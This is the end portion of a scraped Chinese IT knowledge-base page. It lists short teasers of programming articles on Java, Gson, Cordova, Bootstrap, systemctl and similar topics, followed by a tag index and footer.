                                       title="Java生成全局唯一标识符" target="_blank">Java生成全局唯一标识符</a>
                                    <span class="text-muted">darrenzhu</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/uuid/1.htm">uuid</a><a class="tag" taget="_blank" href="/search/unique/1.htm">unique</a><a class="tag" taget="_blank" href="/search/identifier/1.htm">identifier</a><a class="tag" taget="_blank" href="/search/id/1.htm">id</a>
                                    <div>How to generate a globally unique identifier in Java 
 
 
 
http://stackoverflow.com/questions/21536572/generate-unique-id-in-java-to-label-groups-of-related-entries-in-a-log 
 
 
http://stackoverflow</div>
                                </li>
                                <li><a href="/article/2598.htm"
                                       title="php安装模块检测是否已安装过, 使用的SQL语句" target="_blank">php安装模块检测是否已安装过, 使用的SQL语句</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                                    <div>       
SHOW [FULL] TABLES [FROM db_name] [LIKE 'pattern'] 
SHOW TABLES列举了给定数据库中的非TEMPORARY表。您也可以使用mysqlshow db_name命令得到此清单。 
本命令也列举数据库中的其它视图。支持FULL修改符，这样SHOW FULL TABLES就可以显示第二个输出列。对于一个表，第二列的值为BASE T</div>
                                </li>
                                <li><a href="/article/2725.htm"
                                       title="5天学会一种 web 开发框架" target="_blank">5天学会一种 web 开发框架</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/%E6%A1%86%E6%9E%B6/1.htm">框架</a><a class="tag" taget="_blank" href="/search/framework/1.htm">framework</a>
                                    <div>web framework层出不穷，特别是ruby/python,各有10+个,php/java也是一大堆 根据我自己的经验写了一个to do list,按照这个清单，一条一条的学习，事半功倍，很快就能掌握 一共25条，即便很磨蹭，2小时也能搞定一条，25*2=50。只需要50小时就能掌握任意一种web框架 
各类web框架大同小异:现代web开发框架的6大元素，把握主线，就不会迷路 
建议把本文</div>
                                </li>
                                <li><a href="/article/2852.htm"
                                       title="Gson使用三(Map集合的处理,一对多处理)" target="_blank">Gson使用三(Map集合的处理,一对多处理)</a>
                                    <span class="text-muted">eksliang</span>
<a class="tag" taget="_blank" href="/search/json/1.htm">json</a><a class="tag" taget="_blank" href="/search/gson/1.htm">gson</a><a class="tag" taget="_blank" href="/search/Gson+map/1.htm">Gson map</a><a class="tag" taget="_blank" href="/search/Gson+%E9%9B%86%E5%90%88%E5%A4%84%E7%90%86/1.htm">Gson 集合处理</a>
                                    <div>转载请出自出处：http://eksliang.iteye.com/blog/2175532 一、概述 
&nbsp; &nbsp; &nbsp; &nbsp;Map保存的是键值对的形式，Json的格式也是键值对的，所以正常情况下，map跟json之间的转换应当是理所当然的事情。 二、Map参考实例 
package com.ickes.json;

import java.lang.refl</div>
                                </li>
                                <li><a href="/article/2979.htm"
                                       title="cordova实现“再点击一次退出”效果" target="_blank">cordova实现“再点击一次退出”效果</a>
                                    <span class="text-muted">gundumw100</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                                    <div>基本的写法如下： 
 


document.addEventListener(&quot;deviceready&quot;, onDeviceReady, false);
			
function onDeviceReady() {
	//navigator.splashscreen.hide();
        document.addEventListener(&quot;b</div>
                                </li>
                                <li><a href="/article/3106.htm"
                                       title="openldap configuration leaning note" target="_blank">openldap configuration leaning note</a>
                                    <span class="text-muted">iwindyforest</span>
<a class="tag" taget="_blank" href="/search/configuration/1.htm">configuration</a>
                                    <div>hostname // to display the computer name 
hostname &lt;changed name&gt; // to change 
go to: /etc/sysconfig/network, add/modify HOSTNAME=NEWNAME to change permenately 
dont forget to change /etc/hosts</div>
                                </li>
                                <li><a href="/article/3233.htm"
                                       title="Nullability and Objective-C" target="_blank">Nullability and Objective-C</a>
                                    <span class="text-muted">啸笑天</span>
<a class="tag" taget="_blank" href="/search/Objective-C/1.htm">Objective-C</a>
                                    <div>https://developer.apple.com/swift/blog/?id=25 
&nbsp; 
http://www.cocoachina.com/ios/20150601/11989.html 
&nbsp; 
http://blog.csdn.net/zhangao0086/article/details/44409913 
&nbsp; 
http://blog.sunnyxx</div>
                                </li>
                                <li><a href="/article/3360.htm"
                                       title="jsp中实现参数隐藏的两种方法" target="_blank">jsp中实现参数隐藏的两种方法</a>
                                    <span class="text-muted">macroli</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/jsp/1.htm">jsp</a>
                                    <div>在一个JSP页面有一个链接，//确定是一个链接?点击弹出一个页面，需要传给这个页面一些参数。//正常的方法是设置弹出页面的src=&quot;***.do?p1=aaa&amp;p2=bbb&amp;p3=ccc&quot;//确定目标URL是Action来处理?但是这样会在页面上看到传过来的参数，可能会不安全。要求实现src=&quot;***.do&quot;，参数通过其他方法传！//////</div>
                                </li>
                                <li><a href="/article/3487.htm"
                                       title="Bootstrap A标签关闭modal并打开新的链接解决方案" target="_blank">Bootstrap A标签关闭modal并打开新的链接解决方案</a>
                                    <span class="text-muted">qiaolevip</span>
<a class="tag" taget="_blank" href="/search/%E6%AF%8F%E5%A4%A9%E8%BF%9B%E6%AD%A5%E4%B8%80%E7%82%B9%E7%82%B9/1.htm">每天进步一点点</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0%E6%B0%B8%E6%97%A0%E6%AD%A2%E5%A2%83/1.htm">学习永无止境</a><a class="tag" taget="_blank" href="/search/bootstrap/1.htm">bootstrap</a><a class="tag" taget="_blank" href="/search/%E7%BA%B5%E8%A7%82%E5%8D%83%E8%B1%A1/1.htm">纵观千象</a>
                                    <div>Bootstrap里面的js modal控件使用起来很方便，关闭也很简单。只需添加标签&nbsp;data-dismiss=&quot;modal&quot; 即可。 
可是偏偏有时候需要a标签既要关闭modal，有要打开新的链接，尝试多种方法未果。只好使用原始js来控制。 
&nbsp; 
&lt;a href=&quot;#/group-buy&quot; class=&quot;btn bt</div>
                                </li>
                                <li><a href="/article/3614.htm"
                                       title="二维数组在Java和C中的区别" target="_blank">二维数组在Java和C中的区别</a>
                                    <span class="text-muted">流淚的芥末</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/c/1.htm">c</a><a class="tag" taget="_blank" href="/search/%E4%BA%8C%E7%BB%B4%E6%95%B0%E7%BB%84/1.htm">二维数组</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E7%BB%84/1.htm">数组</a>
                                    <div>Java代码： 
&nbsp; 
public class test03 {
	public static void main(String[] args) {
		int[][] a = {{1},{2,3},{4,5,6}};
		System.out.println(a[0][1]);
	}
} 
&nbsp;运行结果： 
Exception in thread &quot;mai</div>
                                </li>
                                <li><a href="/article/3741.htm"
                                       title="systemctl命令用法" target="_blank">systemctl命令用法</a>
                                    <span class="text-muted">wmlJava</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/systemctl/1.htm">systemctl</a>
                                    <div>对比表，以 apache / httpd 为例   任务 旧指令 新指令   使某服务自动启动 chkconfig --level 3 httpd on systemctl enable httpd.service   使某服务不自动启动 chkconfig --level 3 httpd off systemctl disable httpd.service   检查服务状态 service h</div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>